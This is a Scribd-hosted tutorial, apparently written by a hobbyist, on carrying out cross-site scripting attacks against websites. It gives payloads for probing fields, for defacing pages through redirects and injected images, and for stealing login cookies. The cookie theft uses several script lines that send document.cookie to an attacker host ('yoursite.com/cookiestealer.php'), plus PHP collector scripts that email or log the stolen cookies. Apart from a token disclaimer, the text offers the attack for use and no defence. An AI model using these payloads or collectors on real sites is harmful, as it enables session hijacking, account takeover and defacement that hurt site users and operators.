KEMBAR78
XSS Tutorial - Cross Scripting Attacks | PDF | Http Cookie | Web Development
Scribd
Upload
18 views3 pages

XSS Tutorial - Cross Scripting Attacks

This document is a tutorial on how to execute Cross-Site Scripting (XSS) attacks on websites, detailing methods for vulnerability testing, defacing sites, and stealing login information. It provides specific code snippets for various attack techniques, including alerting cookies, redirecting users, and logging stolen data. The author disclaims responsibility for any misuse of the information presented.

Uploaded by

sbhdsbsddbhd78
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
18 views3 pages

XSS Tutorial - Cross Scripting Attacks

This document is a tutorial on how to execute Cross-Site Scripting (XSS) attacks on websites, detailing methods for vulnerability testing, defacing sites, and stealing login information. It provides specific code snippets for various attack techniques, including alerting cookies, redirecting users, and logging stolen data. The author disclaims responsibility for any misuse of the information presented.

Uploaded by

sbhdsbsddbhd78
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

CROSS SCRIPTING ATTACK - XSS

In this tutorial I will show you how to hack a website using XSS.The ones I used for
demonstration I did not hurt, and I take no responsibility if you do use them.

Parts Of The Tutorial:

1)Vulnerability Test
2)Defacing
3)Stealing Login Information

Vulnerability Test:

It's pretty simple to find a XSS vulnerability.

Steps:

1)Find a textbox in the site or something where you can submit text.

2)Type in the following:


Code:
<script>alert("XSS");</script>

Defacing:

There are some ways to deface a site when you find a XSS vulnerability.

Makes A Picture Pop-Up:

Code:
"><script>location="www.removed.com/YOURDEFACEPIC";</script>

Replace The Content Of The Page By An Image:


Code:
<img src="yourevilpic.com">

Redirect To A Webpage:
Code:
<meta http-equiv="refresh"
content="0;url=http://www.youhacx0rpic.com/Haxored.html" />

Stealing Login Information:

The first way to do it is to put the following code on the textbox.If there is an
Username field and a Password field just put it on both.
Code:
<script>alert(document.cookie);</script>

It should look like this if it is vulnerable and there is any login information:

Then just get an cookie editor for Firefox or use Opera browser(which has an cookie
editing function)

Cookie Stealing:

In this way of cookie stealing, you set files in a server and then you inject XSS into
the login(s)/url.
I didint made the code's for this part, thats why I dont explain 2 mutch.

URL/Login:

Code:
<script>alert(www.yoursite.com/cookiestealer.php)</script>

OR

Code:
<script>document.location='www.yoursite.com/cookiestealer.php?cookie=
'+escape(document.cookie) </script>

OR

Code:
<script>
document.location = 'http://yoursite.com/steal.php?cookie=' +
document.cookie;
</script>

Cookiestealer.php:

Code:
<?

mail("Your-Email@gmail.com","cookie monster",$_REQUEST['cookie']);

?>
<html>
<script>document.location='http://tutorialblog.org/free-vector-
downloads-part2/'</script>
</html>

OR

Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

In the one up you should have the following files on your server:
-cookiestealer.php(The Script)
-log.txt(The File Where The Logs Will Be Stored)

This is for any page that has got a Text Box and a Submit Button and that accepts
HTML tags(Like Those Blog Commentary Posters):

Code:
<a
href="javascript:void(document.location='http://yoursite.com/cookiest
ealer.php?cookie='+
document.cookie)">Something</a>

Tutorial made by ♠Ð
Ω®l!Xu$♠™.Hope it helps ;)

You might also like